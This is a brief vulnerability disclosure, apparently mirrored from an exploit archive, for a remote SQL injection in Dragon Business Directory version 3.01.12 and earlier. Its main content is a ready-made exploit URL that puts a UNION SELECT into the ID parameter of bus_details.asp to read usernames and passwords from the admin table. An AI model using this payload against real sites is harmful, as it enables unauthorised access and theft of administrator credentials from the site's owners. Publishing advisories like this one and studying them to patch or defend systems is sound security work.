Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15493
HistoryDec 25, 2006 - 12:00 a.m.

Title : Dragon Business Directory <= V3.01.12 (ID) Remote SQL Injection Vulnerability

2006-12-2500:00:00
vulners.com
11

Title : Dragon Business Directory <= V3.01.12 (ID) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : http://www.enthrallweb.us

$$ : 179.40 USD


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//bus_details.asp?ID=[SQL]

Example:

//bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey